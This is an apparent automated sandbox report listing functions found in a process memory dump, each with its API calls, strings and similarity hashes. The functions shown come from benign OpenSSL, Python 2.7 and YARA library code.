MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000001,00000008,?,00000000,?,02C89F33,?,00000001,00000000,?), ref: 02CA83D9
_wfopen.MSVCR90 ref: 02CA83E7
_errno.MSVCR90 ref: 02CA83F5
_errno.MSVCR90 ref: 02CA83FF
fopen.MSVCR90 ref: 02CA840B

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$ErrorLast_errnofopen$_wfopen
String ID:
API String ID: 1544496049-0
Opcode ID: cddac58f30d2307205116f924612ff5a430abf1c9e732c70316af863bb1a1a83
Instruction ID: 22c57a3b163595c3b7a476b46f06e19a16607c5bbcd1de15cfddb39716482d6e
Opcode Fuzzy Hash: cddac58f30d2307205116f924612ff5a430abf1c9e732c70316af863bb1a1a83
Instruction Fuzzy Hash: 6441CA72B002069BDB50DBA5DC65BFEB7B5EF84305F540166EA09EB280DB709E05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02CF0DD0, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 114stringCOMMON

Download Yara Rule

APIs

strrchr.MSVCR90 ref: 02CF0DE3
isspace.MSVCR90 ref: 02CF0E11
isspace.MSVCR90 ref: 02CF0E26
isspace.MSVCR90 ref: 02CF0E55
isspace.MSVCR90 ref: 02CF0E67
isspace.MSVCR90 ref: 02CF0E79
isspace.MSVCR90 ref: 02CF0E93
memcpy.MSVCR90 ref: 02CF0EC4

Strings

..\..\openssl-1.1.0e\crypto\asn1\asn_moid.c, xrefs: 02CF0EA9

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: isspace$memcpystrrchr
String ID: ..\..\openssl-1.1.0e\crypto\asn1\asn_moid.c
API String ID: 3868098041-994196654
Opcode ID: 8dfd30089a5b42b610c2f7bf30c8f9f42988ca89ebec0c79ae6e2de640197911
Instruction ID: 11f06e3eb7a55d165592704cb148ceaf46deb178bd25b5db4ab50fb7469161dc
Opcode Fuzzy Hash: 8dfd30089a5b42b610c2f7bf30c8f9f42988ca89ebec0c79ae6e2de640197911
Instruction Fuzzy Hash: DE314CA3D043911BE7E16B715C40777BADA8FC0745F080439EEC98A247FF56D60596E1

Uniqueness

Uniqueness Score: -1.00%

Function 02C317A0, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON

Download Yara Rule

APIs

PyType_IsSubtype.PYTHON27(?,02D45188), ref: 02C317B9
PyErr_Format.PYTHON27(?,'Match' objects must be compared with objects of the same class), ref: 02C317D3
PyObject_RichCompareBool.PYTHON27(?,?,00000002), ref: 02C3180A
PyObject_RichCompareBool.PYTHON27(?,?,00000002), ref: 02C3181D

Strings

'Match' objects must be compared with objects of the same class, xrefs: 02C317CD

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: BoolCompareObject_Rich$Err_FormatSubtypeType_
String ID: 'Match' objects must be compared with objects of the same class
API String ID: 966302056-74632398
Opcode ID: d77e6296934a7b38919c09e26e4c4773b59e8a0f87a5b64af23ad3b852c9cb8c
Instruction ID: 717f1ab86d28cc7029bb3837403b99d867ae83ee9e9f59b2abbf63f96c63eff9
Opcode Fuzzy Hash: d77e6296934a7b38919c09e26e4c4773b59e8a0f87a5b64af23ad3b852c9cb8c
Instruction Fuzzy Hash: 9931727A7403019FD610CB65EC81E56B3A9FBC83A1B188D25EE59C3341D730FD2987A5

Uniqueness

Uniqueness Score: -1.00%

Function 02C79630, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 108libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?), ref: 02C79658
GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 02C79668
GetProcessWindowStation.USER32 ref: 02C7968C
GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?), ref: 02C796A7
GetLastError.KERNEL32 ref: 02C796B5
GetUserObjectInformationW.USER32(00000000,00000002,?,?,?), ref: 02C796EA
wcsstr.MSVCR90 ref: 02C7970C

Strings

Service-0x, xrefs: 02C79702
_OPENSSL_isservice, xrefs: 02C79662

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: InformationObjectUser$AddressErrorHandleLastModuleProcProcessStationWindowwcsstr
String ID: Service-0x$_OPENSSL_isservice
API String ID: 459917433-1672312481
Opcode ID: a8f50888df9612c7b09eeb001b11b2d59fe82d94289a8c113e4d52f7336f3b13
Instruction ID: 3db970f774a75659c8d981954d20289a03aff69de749637fb54f12c3fcfc8a0b
Opcode Fuzzy Hash: a8f50888df9612c7b09eeb001b11b2d59fe82d94289a8c113e4d52f7336f3b13
Instruction Fuzzy Hash: 1931FC71B40209ABDB50DFB9EC85B9EB7B8EF84720F500755E926D72C0DF309A158B60

Uniqueness

Uniqueness Score: -1.00%

Function 02C89F20, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 97stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02CA82D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,00000000,00000000,00000001,?,?,02C89F33,?,00000001,00000000,?), ref: 02CA8326
Part of subcall function 02CA82D0: GetLastError.KERNEL32(?,02C89F33,?,00000001,00000000,?,?,?,02C9FC93,?,02D1B7D4,?,02C9FCF2,?,00000002,?), ref: 02CA832E
Part of subcall function 02CA82D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,02C89F33,?,00000001,00000000,?,?,?,02C9FC93,?), ref: 02CA8352
Part of subcall function 02CA82D0: GetLastError.KERNEL32(?,02C89F33,?,00000001,00000000,?,?,?,02C9FC93,?,02D1B7D4,?,02C9FCF2,?,00000002,?), ref: 02CA835A
Part of subcall function 02CA82D0: fopen.MSVCR90 ref: 02CA8373

strchr.MSVCR90 ref: 02C89F3D
GetLastError.KERNEL32(..\..\openssl-1.1.0e\crypto\bio\bss_file.c,0000004A), ref: 02C89F5B
_errno.MSVCR90 ref: 02C89F86
_errno.MSVCR90 ref: 02C89F90

Strings

..\..\openssl-1.1.0e\crypto\bio\bss_file.c, xrefs: 02C89F56, 02C89F9C, 02C89FB8
fopen(', xrefs: 02C89F77
',', xrefs: 02C89F71

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$ByteCharMultiWide_errno$fopenstrchr
String ID: ','$..\..\openssl-1.1.0e\crypto\bio\bss_file.c$fopen('
API String ID: 67969700-1337701112
Opcode ID: 0e266bb7828ad874c9f8f2902394c0ba23111bd42f7b2d5b8d9251e04bd9c670
Instruction ID: 5ba58ec09fd9fd87facee4629879f027d6ffeec01610a5bc30e3e17f48c058a0
Opcode Fuzzy Hash: 0e266bb7828ad874c9f8f2902394c0ba23111bd42f7b2d5b8d9251e04bd9c670
Instruction Fuzzy Hash: DA21D872BC031036F12075E57C8BFB7674A8F81F7AF054063FB05A96C1E6D25914A9B2

Uniqueness

Uniqueness Score: -1.00%

Function 02C3BD83, Relevance: 13.9, APIs: 1, Strings: 8, Instructions: 437COMMON

Download Yara Rule

Strings

wrong type "string" for matches operator, xrefs: 02C3BE7B
wrong type "boolean" for matches operator, xrefs: 02C3BE01
wrong type "float" for matches operator, xrefs: 02C3BE56
wrong type "string" for matches operator, xrefs: 02C3BDE2
wrong type "boolean" for matches operator, xrefs: 02C3BE9A
wrong type "integer" for matches operator, xrefs: 02C3BE44
wrong type "float" for matches operator, xrefs: 02C3BDBD
wrong type "integer" for matches operator, xrefs: 02C3BDAB

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: wrong type "boolean" for matches operator$wrong type "boolean" for matches operator$wrong type "float" for matches operator$wrong type "float" for matches operator$wrong type "integer" for matches operator$wrong type "integer" for matches operator$wrong type "string" for matches operator$wrong type "string" for matches operator
API String ID: 0-1871212892
Opcode ID: 9a4684a4e6591afd37e8d0ee9f3f53bfb0691d2f9c14cf6e73da77dc0b1a938c
Instruction ID: ea87bf6d46a181c3ecdedd4acf9e8f01c423c283113009241f68cad818509930
Opcode Fuzzy Hash: 9a4684a4e6591afd37e8d0ee9f3f53bfb0691d2f9c14cf6e73da77dc0b1a938c
Instruction Fuzzy Hash: 9C026CB1A083019FD315DF18D480BAAB7F5BFC8704F148D2EE5898B252EB74DA55CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02C3BEED, Relevance: 13.9, APIs: 1, Strings: 8, Instructions: 434COMMON

Download Yara Rule

Strings

wrong type "integer" for contains operator, xrefs: 02C3BF15
wrong type "float" for contains operator, xrefs: 02C3BF27
wrong type "boolean" for contains operator, xrefs: 02C3C00B
wrong type "float" for contains operator, xrefs: 02C3BFC7
wrong type "integer" for contains operator, xrefs: 02C3BFB2
wrong type "boolean" for contains operator, xrefs: 02C3BF6B
wrong type "string" for contains operator, xrefs: 02C3BF4C
wrong type "string" for contains operator, xrefs: 02C3BFEC

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: wrong type "boolean" for contains operator$wrong type "boolean" for contains operator$wrong type "float" for contains operator$wrong type "float" for contains operator$wrong type "integer" for contains operator$wrong type "integer" for contains operator$wrong type "string" for contains operator$wrong type "string" for contains operator
API String ID: 0-4220623751
Opcode ID: fd3130bdb7b614e3ef31c7591773fe2d55d466521f2b110c32d0814045dc5945
Instruction ID: e3e5ae2c5a602556ad4da356b160692e60101386da87c83af342db10188f9370
Opcode Fuzzy Hash: fd3130bdb7b614e3ef31c7591773fe2d55d466521f2b110c32d0814045dc5945
Instruction Fuzzy Hash: 2C026CB1A083019FD315CF18D884B6AB7E5BFC8704F148D2EE5898B352E774DA55CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02C36620, Relevance: 13.6, APIs: 9, Instructions: 87fileCOMMON

Download Yara Rule

APIs

fopen.MSVCR90 ref: 02C3662B
fseek.MSVCR90 ref: 02C3664C
ftell.MSVCR90 ref: 02C3664F
fseek.MSVCR90 ref: 02C3665C
fclose.MSVCR90 ref: 02C36667

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: fseek$fclosefopenftell
String ID:
API String ID: 821468074-0
Opcode ID: f32b98c104acdef523aa1349e0903d2440bbd5feef02f766fa08ed2d8c1b55c2
Instruction ID: 189b9e68a8c2d3892e669debd004a4580473cccadf433335cf9f3b0a1c6e9251
Opcode Fuzzy Hash: f32b98c104acdef523aa1349e0903d2440bbd5feef02f766fa08ed2d8c1b55c2
Instruction Fuzzy Hash: 36210872B411146BD660A7ACBC89FDB776CEBC4721F140923FA0683281E735AA1986B5

Uniqueness

Uniqueness Score: -1.00%

Function 02C40EF0, Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 356COMMON

Download Yara Rule

APIs

__iob_func.MSVCR90 ref: 02C40F26
__iob_func.MSVCR90 ref: 02C40F31

Strings

invalid character in hex string, xrefs: 02C41309
fatal flex scanner internal error--no action found, xrefs: 02C4131E
invalid character in hex string jump, xrefs: 02C412DB

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: __iob_func
String ID: fatal flex scanner internal error--no action found$invalid character in hex string$invalid character in hex string jump
API String ID: 686374508-3529970439
Opcode ID: 53980195bbba73b769eb2a909228b1cc0e762d79788f5f264e975d62efe96f0c
Instruction ID: 2d241975efc08513cd73771e8a6240e69eda1c7ee2a58e65c47eaca27d254ba4
Opcode Fuzzy Hash: 53980195bbba73b769eb2a909228b1cc0e762d79788f5f264e975d62efe96f0c
Instruction Fuzzy Hash: BDE160B5600B06AFD308CF28D480A66FBB1FB89315F18826AD54987B41DB75F9A5CFD0

Uniqueness

Uniqueness Score: -1.00%

Function 02C32C11, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 94COMMON

Download Yara Rule

APIs

PyGILState_Ensure.PYTHON27 ref: 02C32C7E
PyString_FromString.PYTHON27(?), ref: 02C32C9F
PyDict_SetItemString.PYTHON27(00000000,module,00000000), ref: 02C32CAE
PyObject_CallFunctionObjArgs.PYTHON27(?,00000000,00000000), ref: 02C32CCE
PyLong_AsLong.PYTHON27(00000000), ref: 02C32CEA
PyGILState_Release.PYTHON27(?), ref: 02C32D34

Strings

module, xrefs: 02C32CA8

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: State_String$ArgsCallDict_EnsureFromFunctionItemLongLong_Object_ReleaseString_
String ID: module
API String ID: 1389510812-203695656
Opcode ID: f5834e9c63ce1d7ab74dfcfa1f1e2573c7c007b7fd345db781a3c8eaaed71b8d
Instruction ID: a6919e0c8162dde459af0c2cfcc36ce67d2ff4c4758c7f9e10a487b1f6926443
Opcode Fuzzy Hash: f5834e9c63ce1d7ab74dfcfa1f1e2573c7c007b7fd345db781a3c8eaaed71b8d
Instruction Fuzzy Hash: 4921E672A402015BE7119F64FC856A6B3A0FFC5234B140B26ED2587381D739EE5ACBC3

Uniqueness

Uniqueness Score: -1.00%

Function 02C361A0, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

printf.MSVCR90 ref: 02C361E3
printf.MSVCR90 ref: 02C361ED
printf.MSVCR90 ref: 02C36215
printf.MSVCR90 ref: 02C36221

Strings

AND, xrefs: 02C361D7
%02X, xrefs: 02C36246

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: printf
String ID: %02X$AND
API String ID: 3524737521-2084899897
Opcode ID: 91b6c91f4a62d09f50c459092c5e1707cd09539ae514e94ec979b5548c9f2480
Instruction ID: be7bbe2cbd9838670069004d5f41d210a6e8be04f2db2989050bb9cf62723612
Opcode Fuzzy Hash: 91b6c91f4a62d09f50c459092c5e1707cd09539ae514e94ec979b5548c9f2480
Instruction Fuzzy Hash: B9117A31D4461037E313475CBC027A7F76EAFC2608F294516D98A03302E763EA6596D7

Uniqueness

Uniqueness Score: -1.00%

Function 02C454E0, Relevance: 10.8, APIs: 1, Strings: 6, Instructions: 330COMMON

Download Yara Rule

APIs

_snprintf.MSVCR90 ref: 02C45676

Part of subcall function 02C452B0: memset.MSVCR90 ref: 02C45382
Part of subcall function 02C452B0: memset.MSVCR90 ref: 02C45397

Strings

%s contains .* or .+, consider using .{,N} or .{1,N} with a reasonable value for N, xrefs: 02C45704
hex string, xrefs: 02C45648
%s in rule %s is slowing down scanning, xrefs: 02C458DF
greedy and ungreedy quantifiers can't be mixed in a regular expression, xrefs: 02C456C0
regular expression, xrefs: 02C45651, 02C45663
invalid %s "%s": %s, xrefs: 02C45664

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snprintf
String ID: %s contains .* or .+, consider using .{,N} or .{1,N} with a reasonable value for N$%s in rule %s is slowing down scanning$greedy and ungreedy quantifiers can't be mixed in a regular expression$hex string$invalid %s "%s": %s$regular expression
API String ID: 516210214-3447789961
Opcode ID: 6f52e07c5bc5c4a0b05ae7f462f0dbbfcf063958f5eeb65ede622326c999942c
Instruction ID: ad9807a993ddf2a9ddfac779e090e8cff9a3495cd64b6c45ef3b4886868711ea
Opcode Fuzzy Hash: 6f52e07c5bc5c4a0b05ae7f462f0dbbfcf063958f5eeb65ede622326c999942c
Instruction Fuzzy Hash: 42C1A171A04301AFD725DE54C880FABB3E9AFD4798F84491CF98897341EB74EA05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02C36380, Relevance: 10.6, APIs: 7, Instructions: 78COMMON

Download Yara Rule

APIs

_sopen_s.MSVCR90 ref: 02C3639F
_filelength.MSVCR90 ref: 02C363B7
_close.MSVCR90 ref: 02C363CC

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: _close_filelength_sopen_s
String ID:
API String ID: 1367608944-0
Opcode ID: 91a6c3683711e36107b5bb22972c48ab8ebfc8a01d991f0d3d806ebd2ee19dfd
Instruction ID: 4fd45aeeb6b5411bb352ac3aa02fd5ba30a462307f3829963bb6ca05d1f83c21
Opcode Fuzzy Hash: 91a6c3683711e36107b5bb22972c48ab8ebfc8a01d991f0d3d806ebd2ee19dfd
Instruction Fuzzy Hash: 6211D8B6A442016BC654DBB8EC44A8B7798EFC4771F244E2AF657C3280DB30E564D7A2

Uniqueness

Uniqueness Score: -1.00%

Function 02C310E0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

PyGILState_Ensure.PYTHON27 ref: 02C31110
_PyObject_CallMethod_SizeT.PYTHON27(?,read,02D45564,?), ref: 02C31124
PyGILState_Release.PYTHON27(00000000), ref: 02C3112D
PyString_AsStringAndSize.PYTHON27(00000000,?,?), ref: 02C31145
memcpy.MSVCR90 ref: 02C31164

Strings

read, xrefs: 02C3111C

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: SizeState_$CallEnsureMethod_Object_ReleaseStringString_memcpy
String ID: read
API String ID: 3747437082-2555855207
Opcode ID: df3122917827e574d251712e68b8daf51388c1653eb53240d535b7a90e2f4e50
Instruction ID: 585bc1006735a76da3c5e2398f38d5ec7c1590e7a6c45ecbb30b41662fe0859e
Opcode Fuzzy Hash: df3122917827e574d251712e68b8daf51388c1653eb53240d535b7a90e2f4e50
Instruction Fuzzy Hash: 9D217F719043019FD710DF24EC80AABB7E4FFC5664F140E1DF9A983241D775DA1A8BA2

Uniqueness

Uniqueness Score: -1.00%

Function 02C31DB0, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 39COMMON

Download Yara Rule

APIs

PyErr_Format.PYTHON27(02999968,line %d: %s,?,?), ref: 02C31DF7

Strings

line %d: %s, xrefs: 02C31E2F
line %d: %s, xrefs: 02C31DF1
%s(%d): %s, xrefs: 02C31DD8
%s(%d): %s, xrefs: 02C31E16

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
